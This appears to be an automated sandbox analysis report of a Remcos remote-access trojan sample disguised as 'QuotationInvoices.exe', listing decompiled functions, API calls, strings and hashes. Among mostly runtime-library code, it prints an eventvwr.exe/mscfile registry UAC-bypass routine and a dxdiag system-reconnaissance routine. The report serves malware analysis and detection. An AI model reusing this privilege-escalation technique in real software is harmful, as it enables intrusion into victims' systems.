Instruction Fuzzy Hash: 6C517F71A002549ACB04FBB5C852AFE7769AF95309F40003FF846A71D2EE7C5E89C799

Uniqueness

Uniqueness Score: -1.00%

Function 0044331E, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 152
fileCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E0044331E(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
				signed int _v8;
				signed char _v15;
				char _v16;
				void _v24;
				short _v28;
				char _v31;
				void _v32;
				long _v36;
				intOrPtr _v40;
				void* _v44;
				signed int _v48;
				signed char* _v52;
				long _v56;
				int _v60;
				signed int _t78;
				signed int _t80;
				int _t86;
				void* _t94;
				long _t97;
				void _t105;
				void* _t112;
				signed int _t116;
				signed int _t118;
				signed char _t123;
				signed char _t128;
				intOrPtr _t129;
				signed int _t131;
				signed char* _t133;
				intOrPtr* _t135;
				signed int _t136;
				void* _t137;

				_t78 =  *0x46900c; // 0x7c295e5c
				_v8 = _t78 ^ _t136;
				_t80 = _a8;
				_t118 = _t80 >> 6;
				_t116 = (_t80 & 0x0000003f) * 0x30;
				_t133 = _a12;
				_v52 = _t133;
				_v48 = _t118;
				_v44 =  *((intOrPtr*)( *((intOrPtr*)(0x46a800 + _t118 * 4)) + _t116 + 0x18));
				_v40 = _a16 + _t133;
				_t86 = GetConsoleCP();
				_t135 = _a4;
				_v60 = _t86;
				 *_t135 = 0;
				 *((intOrPtr*)(_t135 + 4)) = 0;
				 *((intOrPtr*)(_t135 + 8)) = 0;
				while(_t133 < _v40) {
					_v28 = 0;
					_v31 =  *_t133;
					_t129 =  *((intOrPtr*)(0x46a800 + _v48 * 4));
					_t123 =  *(_t129 + _t116 + 0x2d);
					if((_t123 & 0x00000004) == 0) {
						if(( *(L0043DB56(_t116, _t129) + ( *_t133 & 0x000000ff) * 2) & 0x00008000) == 0) {
							_push(1);
							_push(_t133);
							goto L8;
						} else {
							if(_t133 >= _v40) {
								_t131 = _v48;
								 *((char*)( *((intOrPtr*)(0x46a800 + _t131 * 4)) + _t116 + 0x2e)) =  *_t133;
								 *( *((intOrPtr*)(0x46a800 + _t131 * 4)) + _t116 + 0x2d) =  *( *((intOrPtr*)(0x46a800 + _t131 * 4)) + _t116 + 0x2d) | 0x00000004;
								 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 4)) + 1;
							} else {
								_t112 = L00441DE0( &_v28, _t133, 2);
								_t137 = _t137 + 0xc;
								if(_t112 != 0xffffffff) {
									_t133 =  &(_t133[1]);
									goto L9;
								}
							}
						}
					} else {
						_t128 = _t123 & 0x000000fb;
						_v16 =  *((intOrPtr*)(_t129 + _t116 + 0x2e));
						_push(2);
						_v15 = _t128;
						 *(_t129 + _t116 + 0x2d) = _t128;
						_push( &_v16);
						L8:
						_push( &_v28);
						_t94 = L00441DE0();
						_t137 = _t137 + 0xc;
						if(_t94 != 0xffffffff) {
							L9:
							_t133 =  &(_t133[1]);
							_t97 = WideCharToMultiByte(_v60, 0,  &_v28, 1,  &_v24, 5, 0, 0);
							_v56 = _t97;
							if(_t97 != 0) {
								if(WriteFile(_v44,  &_v24, _t97,  &_v36, 0) == 0) {
									L19:
									 *_t135 = GetLastError();
								} else {
									 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 8)) - _v52 + _t133;
									if(_v36 >= _v56) {
										if(_v31 != 0xa) {
											goto L16;
										} else {
											_t105 = 0xd;
											_v32 = _t105;
											if(WriteFile(_v44,  &_v32, 1,  &_v36, 0) == 0) {
												goto L19;
											} else {
												if(_v36 >= 1) {
													 *((intOrPtr*)(_t135 + 8)) =  *((intOrPtr*)(_t135 + 8)) + 1;
													 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 4)) + 1;
													goto L16;
												}
											}
										}
									}
								}
							}
						}
					}
					goto L20;
					L16:
				}
				L20:
				return E0042F3BB(_v8 ^ _t136);
			}

0x00443326
0x0044332d
0x00443330
0x00443338
0x0044333c
0x00443348
0x0044334b
0x0044334e
0x00443355
0x0044335d
0x00443360
0x00443366
0x0044336c
0x00443371
0x00443373
0x00443376
0x0044337b
0x00443385
0x0044338c
0x0044338f
0x00443396
0x0044339d
0x004433c9
0x004433ef
0x004433f1
0x00000000
0x004433cb
0x004433ce
0x00443495
0x004434a1
0x004434ac
0x004434b1
0x004433d4
0x004433db
0x004433e0
0x004433e6
0x004433ec
0x00000000
0x004433ec
0x004433e6
0x004433ce
0x0044339f
0x004433a3
0x004433a6
0x004433ac
0x004433ae
0x004433b1
0x004433b5
0x004433f2
0x004433f5
0x004433f6
0x004433fb
0x00443401
0x00443407
0x00443416
0x0044341c
0x00443422
0x00443427
0x00443443
0x004434b6
0x004434bc
0x00443445
0x0044344d
0x00443456
0x0044345c
0x00000000
0x0044345e
0x00443460
0x00443463
0x0044347c
0x00000000
0x0044347e
0x00443482
0x00443484
0x00443487
0x00000000
0x00443487
0x00443482
0x0044347c
0x0044345c
0x00443456
0x00443443
0x00443427
0x00443401
0x00000000
0x0044348a
0x0044348a
0x004434be
0x004434d0

APIs

GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,00443A93,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 00443360
__fassign.LIBCMT ref: 004433DB
__fassign.LIBCMT ref: 004433F6
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 0044341C
WriteFile.KERNEL32(?,FF8BC35D,00000000,00443A93,00000000,?,?,?,?,?,?,?,?,?,00443A93,?), ref: 0044343B
WriteFile.KERNEL32(?,?,00000001,00443A93,00000000,?,?,?,?,?,?,?,?,?,00443A93,?), ref: 00443474

Strings

\^)|/, xrefs: 00443326

Memory Dump Source

Source File: 00000001.00000001.663167910.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.663464805.000000000046E000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID: \^)|/
API String ID: 1324828854-265608074
Opcode ID: a27c60a98eed64401ac403af7b39cc7a9207b39cec736265133e56206419d8fb
Instruction ID: 8c83b222c19ab41d690930d238a06277c2ed45d6de72c0c0d9503fee416cc943
Opcode Fuzzy Hash: a27c60a98eed64401ac403af7b39cc7a9207b39cec736265133e56206419d8fb
Instruction Fuzzy Hash: C051E470E002099FEB11CFA8DC81AEEBBF8EF09701F14416BE955E7251E7749A41CB69

Uniqueness

Uniqueness Score: -1.00%

Function 00413136, Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 110
sleepfileCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E00413136(void* __ecx, void* __eflags, char _a4) {
				char _v28;
				char _v52;
				char _v76;
				char _v180;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t35;
				void* _t38;
				void* _t54;
				void* _t55;
				void* _t90;
				void* _t92;
				void* _t95;

				_t98 = __eflags;
				L00402F9A(_t54,  &_v76, E0040412C(_t54,  &_v52, L00438F0F(_t54, __ecx, __eflags, L"temp")), _t90, _t98, L"\\sysinfo.txt");
				L00401E54();
				_t55 = 0;
				ShellExecuteW(0, L"open", L"dxdiag", L00401E4F(L0040B61A( &_v52, L"/t ", 0,  &_v76)), 0, 0);
				L00401E54();
				E0040201F(0,  &_v28);
				_t92 = 0;
				do {
					_t35 = L00401E4F( &_v76);
					_t87 =  &_v28;
					E0041735B(_t35,  &_v28);
					Sleep(0x64);
					_t92 = _t92 + 1;
				} while (L00409A84() != 0 && _t92 < 0x4b0);
				_t38 = L00409A84();
				_t102 = _t38;
				if(_t38 == 0) {
					DeleteFileW(L00401E4F( &_v76));
					L00404712(_t55,  &_v180, 1);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					E004048C2(_t87);
					L00402ECA(_t55, _t95 - 0xfffffffffffffff8, E0040704B( &_v52,  &_a4, 0x46b218), _t102,  &_v28);
					_push(0x97);
					L0040495D(_t55,  &_v180, _t48, _t102);
					L00404CC1(L00401F11(),  &_v180);
					_t55 = 1;
					L00404CD3(1,  &_v180, _t48, _t95 - 0x10, _t95 - 0xfffffffffffffff8);
				}
				L00401F11();
				L00401E54();
				L00401F11();
				return _t55;
			}

0x00413136
0x00413160
0x00413169
0x0041316e
0x00413197
0x004131a0
0x004131a8
0x004131ad
0x004131af
0x004131b2
0x004131b7
0x004131bc
0x004131c3
0x004131cc
0x004131d2
0x004131e1
0x004131e6
0x004131e8
0x004131f7
0x00413205
0x0041321a
0x0041321b
0x0041321c
0x0041321d
0x0041321e
0x00413241
0x00413247
0x00413252
0x00413265
0x00413270
0x00413272
0x00413272
0x0041327a
0x00413282
0x0041328a
0x00413297

APIs

Part of subcall function 0040B61A: char_traits.LIBCPMT ref: 0040B62A

ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 00413197

Part of subcall function 0041735B: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,00000000,00000000,?,00408766), ref: 00417378

Sleep.KERNEL32(00000064), ref: 004131C3
DeleteFileW.KERNEL32(00000000), ref: 004131F7

Strings

/t , xrefs: 00413176
temp, xrefs: 00413147
open, xrefs: 00413191
\sysinfo.txt, xrefs: 00413142
dxdiag, xrefs: 0041318C

Memory Dump Source

Source File: 00000001.00000001.663167910.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.663464805.000000000046E000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: File$CreateDeleteExecuteShellSleepchar_traits
String ID: /t $\sysinfo.txt$dxdiag$open$temp
API String ID: 2701014334-2001430897
Opcode ID: 8856a3b0cdab90a8792e2c28623521e7ff7c76892189f5558b140ee398f7dce7
Instruction ID: 331e32823723bee15d4d6cf199a03cbb9b765919d9e4f15e9c5cd1c0ec134db1
Opcode Fuzzy Hash: 8856a3b0cdab90a8792e2c28623521e7ff7c76892189f5558b140ee398f7dce7
Instruction Fuzzy Hash: 2D3183719002095ACB04FBA5DC96AEE7725AF91708F00007FFA06771D2EF782A49CA99

Uniqueness

Uniqueness Score: -1.00%

Function 00405A90, Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 78
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E00405A90(void* __ebx, void* __ecx, void* __edx) {
				char _v28;
				char _v52;
				void* _t8;
				void* _t10;
				void* _t11;
				void* _t12;
				void* _t14;
				void* _t21;
				void* _t24;
				void* _t28;
				void* _t50;

				_t28 = __ecx;
				if( *0x4699d4 != 0) {
					return 1;
				}
				_t8 = E00405C2E(__ecx);
				__eflags = _t8 - 0x3a9f;
				if(_t8 < 0x3a9f) {
					_push(_t28);
					E004101A2( &_v28, 0x80000000, "mscfile\\shell\\open\\command", 0x45e65c);
					_t10 = E004023D3();
					_t11 = E00401EF9(0x46b540);
					_t12 = E004023D3();
					_t14 = E00401EF9( &_v28);
					E00410540(E00401EF9(0x46b4f8), __eflags, "origmsc", _t14, _t12 + 1, _t11, _t10);
					_push(2);
					E0040412C(__ebx, _t50 + 0x18 - 0x18, "C:\Users\jones\Desktop\QuotationInvoices.exe");
					_push(0x464a0c);
					E0041040C(0x80000001, L"Software\\Classes\\mscfile\\shell\\open\\command");
					E00417992( &_v52, 0x34, __eflags, "eventvwr.exe");
					_t21 = ShellExecuteW(0, L"open", E00401E4F( &_v52), 0x464a0c, 0x464a0c, 0);
					__eflags = _t21 - 0x20;
					if(_t21 <= 0x20) {
						E00401E54();
						E00401F11();
						_t24 = 2;
						return _t24;
					}
					ExitProcess(0);
				}
				return _t8;
			}

0x00405a90
0x00405a9e
0x00000000
0x00405aa2
0x00405aa8
0x00405aad
0x00405ab2
0x00405ab8
0x00405acb
0x00405ad9
0x00405ae1
0x00405aea
0x00405af4
0x00405b0b
0x00405b13
0x00405b1f
0x00405b2e
0x00405b34
0x00405b43
0x00405b5f
0x00405b65
0x00405b68
0x00405b75
0x00405b7d
0x00405b84
0x00000000
0x00405b84
0x00405b6c
0x00405b6c
0x00405b89

APIs

ShellExecuteW.SHELL32(00000000,open,00000000,00464A0C,00464A0C,00000000), ref: 00405B5F
ExitProcess.KERNEL32 ref: 00405B6C

Strings

mscfile\shell\open\command, xrefs: 00405ABE
C:\Users\user\Desktop\QuotationInvoices.exe, xrefs: 00405B1A
open, xrefs: 00405B58
origmsc, xrefs: 00405AFA
Software\Classes\mscfile\shell\open\command, xrefs: 00405B29
eventvwr.exe, xrefs: 00405B39

Memory Dump Source

Source File: 00000001.00000002.919290826.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.919336614.000000000046E000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: ExecuteExitProcessShell
String ID: C:\Users\user\Desktop\QuotationInvoices.exe$Software\Classes\mscfile\shell\open\command$eventvwr.exe$mscfile\shell\open\command$open$origmsc
API String ID: 1124553745-611769384
Opcode ID: f8c29e005c698a6dee871c6c73230baafd6fa2f085358b60273d19ed5ad80fc7
Instruction ID: 226e4e39e8d2171791e21b600959ee58c0bbb94e1142b0dc6e75cd03a70d9336
Opcode Fuzzy Hash: f8c29e005c698a6dee871c6c73230baafd6fa2f085358b60273d19ed5ad80fc7
Instruction Fuzzy Hash: 5B119271A402146AD60476A6DC57BAF33588B50709F50007FF906B61D3EEBC598986EE

Uniqueness

Uniqueness Score: -1.00%

Function 0040ECBC, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 64
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E0040ECBC(void* __ebx, void* __edx, void* __edi, void* __eflags, intOrPtr _a4) {
				void* _v8;
				char _v12;
				char _v28;
				intOrPtr _v36;
				intOrPtr* _t34;
				void* _t39;
				intOrPtr* _t41;
				intOrPtr* _t42;

				E0042F715( &_v12, 0);
				_t39 =  *0x46cb50;
				_v8 = _t39;
				_t41 = E0040BA0F(_a4, E0040B938(0x46cd08));
				if(_t41 != 0) {
					L5:
					E0042F76D( &_v12);
					return _t41;
				} else {
					if(_t39 == 0) {
						__eflags = E0040ED83(__ebx, __edx,  &_v8, _a4) - 0xffffffff;
						if(__eflags == 0) {
							_t9 =  &_v28; // 0x40e620
							_t34 = _t9;
							E0040B7FE(_t34);
							_t10 =  &_v28; // 0x40e620
							E0043170A(_t10, 0x467604);
							asm("int3");
							_push(_t41);
							_t42 = _t34;
							E0040B6DF(_t34, _v36);
							 *_t42 = 0x453270;
							return _t42;
						} else {
							_t41 = _v8;
							 *0x46cb50 = _t41;
							 *((intOrPtr*)( *_t41 + 4))();
							E0042F926(__eflags, _t41);
							goto L5;
						}
					} else {
						_t41 = _t39;
						goto L5;
					}
				}
			}

0x0040ecc9
0x0040ecce
0x0040ecd9
0x0040ecea
0x0040ecee
0x0040ed22
0x0040ed25
0x0040ed31
0x0040ecf0
0x0040ecf2
0x0040ed06
0x0040ed09
0x0040ed32
0x0040ed32
0x0040ed35
0x0040ed3f
0x0040ed43
0x0040ed48
0x0040ed4c
0x0040ed50
0x0040ed52
0x0040ed57
0x0040ed61
0x0040ed0b
0x0040ed0b
0x0040ed10
0x0040ed18
0x0040ed1c
0x00000000
0x0040ed21
0x0040ecf4
0x0040ecf4
0x00000000
0x0040ecf4
0x0040ecf2

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0040ECC9
int.LIBCPMT ref: 0040ECDC

Part of subcall function 0040B938: std::_Lockit::_Lockit.LIBCPMT ref: 0040B949
Part of subcall function 0040B938: std::_Lockit::~_Lockit.LIBCPMT ref: 0040B963

std::locale::_Getfacet.LIBCPMT ref: 0040ECE5
std::_Facet_Register.LIBCPMT ref: 0040ED1C
std::_Lockit::~_Lockit.LIBCPMT ref: 0040ED25
__CxxThrowException@8.LIBVCRUNTIME ref: 0040ED43
std::exception::exception.LIBCMT ref: 0040ED52

Strings

@, xrefs: 0040ED32, 0040ED3F, 0040ED42

Memory Dump Source

Source File: 00000001.00000002.919290826.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.919336614.000000000046E000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::exception::exceptionstd::locale::_
String ID: @
API String ID: 2287991272-1615503679
Opcode ID: e90281a8d1fdacc8ed8542b6b538a24fb937729ed745df08b8e05ef932fbe2af
Instruction ID: 166df7291b25bce035c2285595526a4e19d9a86e3f91fcfff2f3c3d1a8db5299
Opcode Fuzzy Hash: e90281a8d1fdacc8ed8542b6b538a24fb937729ed745df08b8e05ef932fbe2af
Instruction Fuzzy Hash: 00112732A00119A7CB10BFAAE8418AE7B68DF40764F50057FF804B72A1EF789E0587D9

Uniqueness

Uniqueness Score: -1.00%

Function 004183E6, Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 48
windowstringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004183E6(void* __eflags) {
				struct tagMSG _v32;
				char _v300;
				int _t14;

				GetModuleFileNameA(0,  &_v300, 0x104);
				 *0x46aebc = E00418498();
				0x46aeb8->cbSize = 0x1fc;
				 *0x46aec0 = 1;
				 *0x46aec8 = 0x401;
				 *0x46aecc = ExtractIconA(0,  &_v300, 0);
				lstrcpynA(0x46aed0, "Remcos", 0x80);
				 *0x46aec4 = 7;
				Shell_NotifyIconA(0, 0x46aeb8);
				while(1) {
					_t14 = GetMessageA( &_v32, 0, 0, 0);
					if(_t14 == 0) {
						break;
					}
					TranslateMessage( &_v32);
					DispatchMessageA( &_v32);
				}
				return _t14;
			}

0x004183ff
0x0041840a
0x00418418
0x00418422
0x0041842c
0x0041844b
0x00418450
0x0041845c
0x00418466
0x00418482
0x00418489
0x00418491
0x00000000
0x00000000
0x00418472
0x0041847c
0x0041847c
0x00418497

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 004183FF

Part of subcall function 00418498: RegisterClassExA.USER32(00000030), ref: 004184E4
Part of subcall function 00418498: CreateWindowExA.USER32 ref: 004184FF
Part of subcall function 00418498: GetLastError.KERNEL32 ref: 00418509

ExtractIconA.SHELL32(00000000,?,00000000), ref: 00418436
lstrcpynA.KERNEL32(0046AED0,Remcos,00000080), ref: 00418450
Shell_NotifyIconA.SHELL32(00000000,0046AEB8), ref: 00418466
TranslateMessage.USER32(?), ref: 00418472
DispatchMessageA.USER32 ref: 0041847C
GetMessageA.USER32 ref: 00418489

Strings

Remcos, xrefs: 00418441

Memory Dump Source

Source File: 00000001.00000001.663167910.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.663464805.000000000046E000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
String ID: Remcos
API String ID: 1970332568-165870891
Opcode ID: 21c3869535bccc1c5a2b644e99db202f946004d3f927a6f3455c8dfc261e3508
Instruction ID: 51156648c8a881560171937b03eb70279f8ee016f3d20d61117a464244599c05
Opcode Fuzzy Hash: 21c3869535bccc1c5a2b644e99db202f946004d3f927a6f3455c8dfc261e3508
Instruction Fuzzy Hash: 310156B1940605ABD7109FA1ED0CE9B77BCF786702F00002BF605A2161EBF990558F5A

Uniqueness

Uniqueness Score: -1.00%

Function 00444C19, Relevance: 13.8, APIs: 9, Instructions: 300
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E00444C19(signed int _a4, void* _a8, unsigned int _a12) {
				signed int _v5;
				char _v6;
				void* _v12;
				unsigned int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				void* _v32;
				long _v36;
				void* _v40;
				long _v44;
				signed int* _t143;
				signed int _t145;
				intOrPtr _t149;
				signed int _t153;
				signed int _t155;
				signed char _t157;
				unsigned int _t158;
				intOrPtr _t162;
				void* _t163;
				signed int _t164;
				signed int _t167;
				long _t168;
				intOrPtr _t175;
				signed int _t176;
				intOrPtr _t178;
				signed int _t180;
				signed int _t184;
				char _t191;
				char* _t192;
				char _t199;
				char* _t200;
				signed char _t211;
				signed int _t213;
				long _t215;
				signed int _t216;
				char _t218;
				signed char _t222;
				signed int _t223;
				unsigned int _t224;
				intOrPtr _t225;
				unsigned int _t229;
				signed int _t231;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				signed int _t235;
				signed char _t236;
				signed int _t237;
				signed int _t239;
				signed int _t240;
				signed int _t241;
				signed int _t242;
				signed int _t246;
				void* _t248;
				void* _t249;

				_t213 = _a4;
				if(_t213 != 0xfffffffe) {
					__eflags = _t213;
					if(_t213 < 0) {
						L58:
						_t143 = E00439B9C();
						 *_t143 =  *_t143 & 0x00000000;
						__eflags =  *_t143;
						 *((intOrPtr*)(E00439BAF())) = 9;
						L59:
						_t145 = E0043600D();
						goto L60;
					}
					__eflags = _t213 -  *0x46aa00; // 0x40
					if(__eflags >= 0) {
						goto L58;
					}
					_v24 = 1;
					_t239 = _t213 >> 6;
					_t235 = (_t213 & 0x0000003f) * 0x30;
					_v20 = _t239;
					_t149 =  *((intOrPtr*)(0x46a800 + _t239 * 4));
					_v28 = _t235;
					_t222 =  *((intOrPtr*)(_t235 + _t149 + 0x28));
					_v5 = _t222;
					__eflags = _t222 & 0x00000001;
					if((_t222 & 0x00000001) == 0) {
						goto L58;
					}
					_t223 = _a12;
					__eflags = _t223 - 0x7fffffff;
					if(_t223 <= 0x7fffffff) {
						__eflags = _t223;
						if(_t223 == 0) {
							L57:
							return 0;
						}
						__eflags = _v5 & 0x00000002;
						if((_v5 & 0x00000002) != 0) {
							goto L57;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							goto L6;
						}
						_t153 =  *((intOrPtr*)(_t235 + _t149 + 0x29));
						_v5 = _t153;
						_v32 =  *((intOrPtr*)(_t235 + _t149 + 0x18));
						_t246 = 0;
						_t155 = _t153 - 1;
						__eflags = _t155;
						if(_t155 == 0) {
							_t236 = _v24;
							_t157 =  !_t223;
							__eflags = _t236 & _t157;
							if((_t236 & _t157) != 0) {
								_t158 = 4;
								_t224 = _t223 >> 1;
								_v16 = _t158;
								__eflags = _t224 - _t158;
								if(_t224 >= _t158) {
									_t158 = _t224;
									_v16 = _t224;
								}
								_t246 = E0043E13D(_t224, _t158);
								E0043E9A5(0);
								E0043E9A5(0);
								_t249 = _t248 + 0xc;
								_v12 = _t246;
								__eflags = _t246;
								if(_t246 != 0) {
									_t162 = E0044424E(_t213, 0, 0, _v24);
									_t225 =  *((intOrPtr*)(0x46a800 + _t239 * 4));
									_t248 = _t249 + 0x10;
									_t240 = _v28;
									 *((intOrPtr*)(_t240 + _t225 + 0x20)) = _t162;
									_t163 = _t246;
									 *(_t240 + _t225 + 0x24) = _t236;
									_t235 = _t240;
									_t223 = _v16;
									L21:
									_t241 = 0;
									_v40 = _t163;
									_t215 =  *((intOrPtr*)(0x46a800 + _v20 * 4));
									_v36 = _t215;
									__eflags =  *(_t235 + _t215 + 0x28) & 0x00000048;
									_t216 = _a4;
									if(( *(_t235 + _t215 + 0x28) & 0x00000048) != 0) {
										_t218 =  *((intOrPtr*)(_t235 + _v36 + 0x2a));
										_v6 = _t218;
										__eflags = _t218 - 0xa;
										_t216 = _a4;
										if(_t218 != 0xa) {
											__eflags = _t223;
											if(_t223 != 0) {
												_t241 = _v24;
												 *_t163 = _v6;
												_t216 = _a4;
												_t232 = _t223 - 1;
												__eflags = _v5;
												_v12 = _t163 + 1;
												_v16 = _t232;
												 *((char*)(_t235 +  *((intOrPtr*)(0x46a800 + _v20 * 4)) + 0x2a)) = 0xa;
												if(_v5 != 0) {
													_t191 =  *((intOrPtr*)(_t235 +  *((intOrPtr*)(0x46a800 + _v20 * 4)) + 0x2b));
													_v6 = _t191;
													__eflags = _t191 - 0xa;
													if(_t191 != 0xa) {
														__eflags = _t232;
														if(_t232 != 0) {
															_t192 = _v12;
															_t241 = 2;
															 *_t192 = _v6;
															_t216 = _a4;
															_t233 = _t232 - 1;
															_v12 = _t192 + 1;
															_v16 = _t233;
															 *((char*)(_t235 +  *((intOrPtr*)(0x46a800 + _v20 * 4)) + 0x2b)) = 0xa;
															__eflags = _v5 - _v24;
															if(_v5 == _v24) {
																_t199 =  *((intOrPtr*)(_t235 +  *((intOrPtr*)(0x46a800 + _v20 * 4)) + 0x2c));
																_v6 = _t199;
																__eflags = _t199 - 0xa;
																if(_t199 != 0xa) {
																	__eflags = _t233;
																	if(_t233 != 0) {
																		_t200 = _v12;
																		_t241 = 3;
																		 *_t200 = _v6;
																		_t216 = _a4;
																		_t234 = _t233 - 1;
																		__eflags = _t234;
																		_v12 = _t200 + 1;
																		_v16 = _t234;
																		 *((char*)(_t235 +  *((intOrPtr*)(0x46a800 + _v20 * 4)) + 0x2c)) = 0xa;
																	}
																}
															}
														}
													}
												}
											}
										}
									}
									_t164 = E0044D477(_t216);
									__eflags = _t164;
									if(_t164 == 0) {
										L41:
										_v24 = 0;
										L42:
										_t167 = ReadFile(_v32, _v12, _v16,  &_v36, 0);
										__eflags = _t167;
										if(_t167 == 0) {
											L53:
											_t168 = GetLastError();
											_t241 = 5;
											__eflags = _t168 - _t241;
											if(_t168 != _t241) {
												__eflags = _t168 - 0x6d;
												if(_t168 != 0x6d) {
													L37:
													E00439B79(_t168);
													goto L38;
												}
												_t242 = 0;
												goto L39;
											}
											 *((intOrPtr*)(E00439BAF())) = 9;
											 *(E00439B9C()) = _t241;
											goto L38;
										}
										_t229 = _a12;
										__eflags = _v36 - _t229;
										if(_v36 > _t229) {
											goto L53;
										}
										_t242 = _t241 + _v36;
										__eflags = _t242;
										L45:
										_t237 = _v28;
										_t175 =  *((intOrPtr*)(0x46a800 + _v20 * 4));
										__eflags =  *(_t237 + _t175 + 0x28) & 0x00000080;
										if(( *(_t237 + _t175 + 0x28) & 0x00000080) != 0) {
											__eflags = _v5 - 2;
											if(_v5 == 2) {
												__eflags = _v24;
												_push(_t242 >> 1);
												_push(_v40);
												_push(_t216);
												if(_v24 == 0) {
													_t176 = E00444775();
												} else {
													_t176 = E00444A85();
												}
											} else {
												_t230 = _t229 >> 1;
												__eflags = _t229 >> 1;
												_t176 = E00444935(_t229 >> 1, _t229 >> 1, _t216, _v12, _t242, _a8, _t230);
											}
											_t242 = _t176;
										}
										goto L39;
									}
									_t231 = _v28;
									_t178 =  *((intOrPtr*)(0x46a800 + _v20 * 4));
									__eflags =  *(_t231 + _t178 + 0x28) & 0x00000080;
									if(( *(_t231 + _t178 + 0x28) & 0x00000080) == 0) {
										goto L41;
									}
									_t180 = GetConsoleMode(_v32,  &_v44);
									__eflags = _t180;
									if(_t180 == 0) {
										goto L41;
									}
									__eflags = _v5 - 2;
									if(_v5 != 2) {
										goto L42;
									}
									_t184 = ReadConsoleW(_v32, _v12, _v16 >> 1,  &_v36, 0);
									__eflags = _t184;
									if(_t184 != 0) {
										_t229 = _a12;
										_t242 = _t241 + _v36 * 2;
										goto L45;
									}
									_t168 = GetLastError();
									goto L37;
								} else {
									 *((intOrPtr*)(E00439BAF())) = 0xc;
									 *(E00439B9C()) = 8;
									L38:
									_t242 = _t241 | 0xffffffff;
									__eflags = _t242;
									L39:
									E0043E9A5(_t246);
									return _t242;
								}
							}
							L15:
							 *(E00439B9C()) =  *_t206 & _t246;
							 *((intOrPtr*)(E00439BAF())) = 0x16;
							E0043600D();
							goto L38;
						}
						__eflags = _t155 != 1;
						if(_t155 != 1) {
							L13:
							_t163 = _a8;
							_v16 = _t223;
							_v12 = _t163;
							goto L21;
						}
						_t211 =  !_t223;
						__eflags = _t211 & 0x00000001;
						if((_t211 & 0x00000001) == 0) {
							goto L15;
						}
						goto L13;
					}
					L6:
					 *(E00439B9C()) =  *_t151 & 0x00000000;
					 *((intOrPtr*)(E00439BAF())) = 0x16;
					goto L59;
				} else {
					 *(E00439B9C()) =  *_t212 & 0x00000000;
					_t145 = E00439BAF();
					 *_t145 = 9;
					L60:
					return _t145 | 0xffffffff;
				}
			}

0x00444c22
0x00444c29
0x00444c43
0x00444c45
0x00444fad
0x00444fad
0x00444fb2
0x00444fb2
0x00444fba
0x00444fc0
0x00444fc0
0x00000000
0x00444fc0
0x00444c4b
0x00444c51
0x00000000
0x00000000
0x00444c59
0x00444c65
0x00444c68
0x00444c6b
0x00444c6e
0x00444c75
0x00444c78
0x00444c7c
0x00444c7f
0x00444c82
0x00000000
0x00000000
0x00444c88
0x00444c8b
0x00444c91
0x00444cab
0x00444cad
0x00444fa9
0x00000000
0x00444fa9
0x00444cb3
0x00444cb7
0x00000000
0x00000000
0x00444cbd
0x00444cc1
0x00000000
0x00000000
0x00444cc8
0x00444ccc
0x00444ccf
0x00444cd2
0x00444cd7
0x00444cd7
0x00444cda
0x00444cf7
0x00444cfc
0x00444cfe
0x00444d00
0x00444d20
0x00444d21
0x00444d23
0x00444d26
0x00444d28
0x00444d2a
0x00444d2c
0x00444d2c
0x00444d37
0x00444d39
0x00444d40
0x00444d45
0x00444d48
0x00444d4b
0x00444d4d
0x00444d72
0x00444d77
0x00444d7e
0x00444d81
0x00444d84
0x00444d88
0x00444d8a
0x00444d8e
0x00444d90
0x00444d93
0x00444d96
0x00444d98
0x00444d9b
0x00444da2
0x00444da5
0x00444daa
0x00444dad
0x00444db6
0x00444dba
0x00444dbd
0x00444dc0
0x00444dc3
0x00444dc9
0x00444dcb
0x00444dd4
0x00444dd7
0x00444dda
0x00444ddd
0x00444dde
0x00444de2
0x00444de8
0x00444df2
0x00444df7
0x00444e07
0x00444e0b
0x00444e0e
0x00444e10
0x00444e12
0x00444e14
0x00444e16
